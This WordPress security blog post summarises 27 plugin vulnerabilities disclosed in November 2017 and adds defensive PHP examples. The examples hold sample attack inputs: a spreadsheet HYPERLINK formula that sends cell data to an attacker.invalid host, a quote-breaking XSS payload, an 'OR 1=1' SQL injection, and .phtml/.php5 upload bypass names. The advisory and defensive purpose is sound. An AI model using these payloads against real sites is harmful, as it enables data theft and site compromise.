WP Security: 27 plugin vulnerabilities in November

December 4, 2017

For your WP security, stay informed about the plugin vulnerabilities disclosed in November:

  1. Qards
    • Stored Cross-Site Scripting (XSS) + Server Side Request Forgery (SSRF) reported by theMiddle (https://twitter.com/Menin_TheMiddle). The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
      • NO update to this premium plugin yet to fix these vulnerabilities.
  2. Import any XML or CSV File to WordPress
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
      • immediately update to version 3.4.5 to fix vulnerability
  3. Contact Form for WordPress – Ultimate Form Builder Lite
    • SQL Injection reported by Dewhurst Security. The exploit being used combines a SQL injection vulnerability and a PHP object injection vulnerability. It allows attackers to take over a vulnerable site using just one request to /wp-admin/admin-ajax.php.
      • immediately update to version 1.3.7 to fix vulnerability. Consider owl CONTACTS as a more secure replacement candidate.
  4. PopCash.Net Code Integration Tool
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. PopCash.Net Publisher Code Integration plugin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
      • immediately update to version 1.1 to fix vulnerability
  5. Easy Appointments
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. The Easy Appointments plugin before 1.12.0 for WordPress has XSS via Settings values in the admin panel.
      • immediately update to version 1.12.0 to fix vulnerability
  6. Caldera Forms
    • Authenticated Cross-Site Scripting (XSS) reported by Will Brand (https://wrbrand.com/). Caldera Forms is vulnerable to a reflected cross-site scripting vulnerability in the "edit" parameter, which is not properly escaped before being printed in an HTML attribute. An attacker can use this to craft URLs that, when clicked, result in malicious JavaScript being executed. Because Caldera Forms uses 'wp_rest' nonces to access the WordPress REST API, a common practice among plugin developers, this JavaScript may do anything the victim user is capable of doing through the REST API.
      • immediately update to version 1.5.5 to fix vulnerability. Consider owl CONTACTS as a more secure replacement candidate.
  7. User Login History
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, (3) user_id, (4) username, (5) country_name, (6) browser, (7) operating_system, or (8) ip_address parameter to admin/partials/listing/listing.php.
      • immediately update to version 1.6 to fix vulnerability
  8. WordCamp Talks
    • Formula injection via CSV exports reported by Dewhurst Security. The WordCamp Talks plugin does not attempt to sanitize CSV exports, which can lead to spreadsheet formula injection via malicious inputs.
      • immediately update to version 1.0.0 Beta3 to fix vulnerability
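The WordCamp Talks issue above is the general CSV export problem: a cell that begins with =, +, -, @, a tab or a carriage return is evaluated as a formula when the file is opened in Excel or LibreOffice. The following plain-PHP helper is an added example, not code from the WordCamp Talks plugin; the speaker rows are constructed sample input.

```php
<?php
// Added example (not WordCamp Talks code): neutralize spreadsheet formula
// injection before writing user-supplied values to a CSV export.

// Characters that make a spreadsheet treat the cell as a formula.
// A leading tab or CR is included because some importers strip them and
// then evaluate what follows.
function csv_safe_cell(string $value): string
{
    $triggers = ['=', '+', '-', '@', "\t", "\r"];
    if ($value === '' || is_numeric($value)) {
        return $value;            // leave plain numbers such as -5 untouched
    }
    if (in_array($value[0], $triggers, true)) {
        // A leading apostrophe forces text interpretation. It stays visible
        // in the cell, which is the accepted trade-off for an export.
        return "'" . $value;
    }
    return $value;
}

// Write rows with fputcsv() so quotes and separators are also quoted properly.
function write_safe_csv(array $rows, $stream): void
{
    foreach ($rows as $row) {
        $cells = array_map('csv_safe_cell', array_map('strval', $row));
        fputcsv($stream, $cells);
    }
}

// Constructed sample input: a header, a benign talk and a malicious one.
$rows = [
    ['Speaker', 'Talk title', 'Rating'],
    ['Alice',   'Securing WordPress', '-1'],
    ['Mallory', '=HYPERLINK("http://attacker.invalid/?"&A1,"click me")', '5'],
];

$out = fopen('php://output', 'w');
write_safe_csv($rows, $out);
fclose($out);
```

Run with `php export.php`; the third row is written as `'=HYPERLINK(...)` and opens as text, while Alice's `-1` rating is kept numeric. Apply the same helper to any export an authenticated but low-privilege user can influence, since the victim is whoever opens the file on their desktop.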
  9. Shortcodes Ultimate
    • Authenticated Contributor Code Execution reported by Robert Mathews (https://tigertech.net/). The Shortcodes Ultimate plugin does not sanitize the "filter" argument to the "su_meta", "su_user", and "su_post" shortcodes, allowing the filter to be set to the "system()" function which runs arbitrary code. This is being exploited in the wild; I discovered this through analysis of mod_security audit logs on two compromised sites today.
      • immediately update to version 5.0.1 to fix vulnerability
  10. Ultimate Instagram Feed
    • Authenticated Cross-Site Scripting (XSS) reported by Dimopoulos Elias (https://gr.linkedin.com/in/dimopouloselias/). The vulnerability lies in the "access_token" parameter and results in reflected XSS.
      • immediately update to version 1.3.1 to fix vulnerability
    • Authenticated Cross-Site Scripting (XSS) reported by Gilzow (http://missouri.edu). XSS vulnerability remains in 1.3 and 1.3.1 as the author passes _GET['access_token'] to sanitize_text_field(). However, the value is inserted into an attribute of an element, and sanitize_text_field() does not filter for quotes (single or double). Therefore, injecting %22+onblur%3D%22alert%281%29 for access_token will still result in an exploitable injection.
      • NO updates provided from developer to fix vulnerability. Remove plugin immediately.
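Gilzow's note on items 10 is the key lesson of this list: sanitize_text_field() is an input sanitizer, not an output escaper, and it leaves single and double quotes alone. The snippet below is an added illustration written against the WordPress API (sanitize_text_field, wp_unslash, esc_attr); it is not the Ultimate Instagram Feed code, and the form field name is assumed.

```php
<?php
// Added example (not Ultimate Instagram Feed code): the same value printed
// into an HTML attribute, once "sanitized" and once properly escaped.
//
// With ?access_token=%22+onblur%3D%22alert%281%29 PHP decodes the value to
//   " onblur="alert(1)
// sanitize_text_field() strips tags, control characters and %xx octets, but
// keeps both quote characters, so the value survives intact.

// Vulnerable: sanitized on input, then dropped into an attribute unescaped.
// The first quote closes value="..." and onblur becomes a new attribute.
function render_token_field_vulnerable(): string
{
    $token = sanitize_text_field($_GET['access_token'] ?? '');
    return '<input type="text" name="access_token" value="' . $token . '">';
}

// Fixed: escape for the output context. esc_attr() encodes " and ' (and
// <, >, &), so nothing in $token can terminate the attribute.
// wp_unslash() removes the slashes WordPress adds to request superglobals.
function render_token_field_fixed(): string
{
    $token = sanitize_text_field(wp_unslash($_GET['access_token'] ?? ''));
    return '<input type="text" name="access_token" value="' . esc_attr($token) . '">';
}
```

The rule that follows: sanitize when you store, escape when you print, and pick the escaper for the context (esc_attr for attributes, esc_html for text nodes, esc_url for href/src, wp_json_encode for inline script data). A sanitizer applied on input never substitutes for that.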
  11. WPML Translation Management
    • PHP Object Injection reported by Thomas Chauchefoin (Synacktiv, https://synacktiv.com/en/). No public disclosure provided.
      • immediately update to version 2.4.2 to fix vulnerability
  12. Simple Events Calendar
    • Authenticated SQL Injection reported by Lenon Leite (http://lenonleite.com.br/). Requires administrator access. "$_POST['event_id']" is not escaped.
      • NO updates provided from developer to fix vulnerability. Remove plugin immediately.
  13. Events
    • Authenticated SQL Injection reported by Lenon Leite (http://lenonleite.com.br/). Requires administrator access. "$_GET['edit_event']" is not escaped.
      • NO updates provided from developer to fix vulnerability. Remove plugin immediately.
  14. JTRT Responsive Tables
    • Authenticated SQL Injection reported by Dewhurst Security. Requires only a registered user account. "$_POST['tableId']" is not escaped.
      • immediately update to version 4.1.1 to fix vulnerability
  15. Active Directory Integration
    • Authenticated SQL Injection reported by Dewhurst Security. Requires administrator access, and the target must have an active LDAP configuration. "$_GET['userid']" is not escaped.
      • NO updates provided from developer to fix vulnerability. Remove plugin immediately.
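Items 12 to 15 are one defect repeated: a request parameter is concatenated into SQL. The block below is an added example against the WordPress database API ($wpdb->prepare, current_user_can, check_admin_referer), not code from any of those plugins; the table name, column and nonce action are assumed for illustration.

```php
<?php
// Added example, not code from the plugins above. Shows the unsafe pattern
// shared by items 12 to 15 and the same query built with $wpdb->prepare().
// Table name "{$wpdb->prefix}events" and nonce action "edit_event" are assumed.

// Vulnerable: $_POST['event_id'] dropped straight into the query text.
// event_id=1 OR 1=1 changes the WHERE clause; a UNION reads other tables.
function get_event_vulnerable()
{
    global $wpdb;
    $event_id = $_POST['event_id'];          // untrusted, not escaped
    return $wpdb->get_row(
        "SELECT * FROM {$wpdb->prefix}events WHERE id = $event_id"
    );
}

// Fixed: the query text is a literal and data goes through placeholders.
// %d is cast to an integer, %s is quoted and escaped by prepare().
function get_event_fixed()
{
    global $wpdb;
    if (!current_user_can('manage_options')) {   // the screen is admin-only; enforce it
        return null;
    }
    check_admin_referer('edit_event');           // reject forged (CSRF) form posts
    $event_id = isset($_POST['event_id']) ? (int) $_POST['event_id'] : 0;
    return $wpdb->get_row(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}events WHERE id = %d",
            $event_id
        )
    );
}
// Keep the first argument of prepare() a literal. If request data can reach
// the format string itself, placeholders can be smuggled in and the
// protection is lost.
```

"Requires administrator access" does not make items 12, 13 and 15 low risk: an admin-only handler without a nonce check can be driven by a link or hidden form on another site, so the capability check and check_admin_referer() belong next to the prepared query.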
  16. UserPro
    • Authentication Bypass reported by Colette Chamberland and Iain Hadgraft (https://wordfence.com/). The UserPro plugin allows bypassing login authentication for the user 'admin'. If the site does not use the standard username 'admin' it is not affected. If the site has a default 'admin' user, the attacker sees the WP admin bar at the top of the site and is logged in with full administrator access.
      • immediately update to version 4.9.17.1 to fix vulnerability
  17. WP Support Plus Responsive Ticket System
    • Remote Code Execution (RCE) reported by Robert Mathews (https://tigertech.net/). WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions like ".phtml", ".php4", ".php5", and so on, all of which are run as if their extension was ".php" on most hosting platforms.
      • immediately update to version 8.0.8 to fix vulnerability
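The WP Support Plus bug is the classic denylist mistake: blocking ".php" while the server also executes .phtml, .php4, .php5 and similar. The plain-PHP check below is an added example, not the plugin's code; the allowed extensions and the sample file names are constructed for illustration.

```php
<?php
// Added example (not WP Support Plus code): an upload check that allowlists
// extensions instead of denylisting ".php", and inspects every extension in
// the name so "shell.php.jpg" style names are rejected as well.

function is_allowed_attachment(string $filename): bool
{
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

    $parts = explode('.', strtolower(basename($filename)));
    if (count($parts) < 2) {
        return false;                         // no extension at all
    }
    array_shift($parts);                      // drop the base name
    foreach ($parts as $ext) {
        if (!in_array($ext, $allowed, true)) {
            return false;                     // any unknown extension rejects the file
        }
    }
    return true;
}

// The bypassable denylist the advisory describes, kept only for contrast.
function is_allowed_by_denylist(string $filename): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return $ext !== 'php';
}

// Constructed sample names: benign uploads and the bypass variants.
$samples = ['report.pdf', 'photo.JPG', 'shell.php', 'shell.phtml',
            'shell.php5', 'shell.php.jpg', 'noext'];

foreach ($samples as $name) {
    printf("%-14s denylist=%-6s allowlist=%s\n", $name,
        is_allowed_by_denylist($name) ? 'allow' : 'reject',
        is_allowed_attachment($name) ? 'allow' : 'reject');
}
```

Running it shows the denylist accepting shell.phtml, shell.php5 and shell.php.jpg while the allowlist rejects all three. The allowlist is deliberately strict (a file called a.b.jpg is refused too); in practice store uploads under a server-generated name outside the web root, and in WordPress let wp_check_filetype_and_ext() validate type against content as well as name.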
  18. Email Log
    • Stored Cross-Site Scripting (XSS) reported by Dewhurst Security. Only a proof of concept was disclosed.
      • immediately update to version 2.2.3 to fix vulnerability
  19. WP Mail Logging
    • Stored Cross-Site Scripting (XSS) reported by Dewhurst Security. Only a proof of concept was disclosed.
      • immediately update to version 1.8.3 to fix vulnerability
  20. bbPress
    • Unauthenticated SQL Injection reported by Dewhurst Security. Requires the anonymous posting option to be enabled and a WordPress version below 4.8.3.
      • NOT patched in bbPress itself: updating WordPress core to 4.8.3 fixes this issue.
  21. Duplicator
    • Stored Cross-Site Scripting (XSS) reported by Dewhurst Security. installer.php in the Snap Creek Duplicator (WordPress Site Migration & Backup) plugin before 1.2.30 for WordPress has XSS because the values "url_new" (/wp-content/plugins/duplicator/installer/build/view.step4.php) and "logging" (/wp-content/plugins/duplicator/installer/build/view.step2.php) are not filtered correctly.
      • immediately update to version 1.2.30 to fix vulnerability (all earlier releases, including 1.2.29, are affected)
  22. Formidable Forms
    • Multiple Vulnerabilities reported by Dewhurst Security. The plugin implemented a form preview AJAX function accessible to anyone without authentication. The function accepted some parameters affecting the way it generates the form preview HTML. Parameters after_html and before_html could be used to add custom HTML after and before the form. Most of the vulnerabilities relied on this feature.
      • immediately update to version 2.05.03 to fix vulnerability. Consider owl CONTACTS as a more secure replacement candidate.
  23. Yoast SEO
    • Unauthenticated Cross-Site Scripting (XSS) reported by Dewhurst Security. Vulnerability in admin/google_search_console/class-gsc-table.php in the Yoast SEO plugin before 5.8.0 for WordPress allows remote attackers to inject arbitrary web script or HTML.
      • immediately update to version 5.8 to fix vulnerability
  24. TablePress
    • Authenticated XML External Entity (XXE) reported by Dewhurst Security. TablePress prior to version 1.8.1 allows an attacker to conduct XML External Entity (XXE) attacks via unspecified vectors.
      • immediately update to version 1.8.1 to fix vulnerability
  25. InLinks
    • Authenticated SQL Injection reported by Dimopoulos Elias (https://gr.linkedin.com/in/dimopouloselias/). SQL injection via the POST parameter "keyword". Affected file: inlinks/inlinks.php.
      • DELETE immediately to fix vulnerability. This plugin has been closed and is no longer available for download.
  26. Elementor Page Builder
    • Authenticated Unrestricted Editing reported by James Golovich (https://pritect.net/). Many AJAX actions are unsecured, allowing logged in users unrestricted access to the internal Elementor functions.
      • immediately update to version 1.8.0 to fix vulnerability
  27. Emag Marketplace Connector
    • Unauthenticated Cross-Site Scripting (XSS) reported by Dewhurst Security. The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
      • immediately update to version 1.0.1 to fix vulnerability

Protect your WordPress!

BEFORE IT'S TOO LATE! You will also protect your customers, your reputation and your online business.


by Csaba Miklós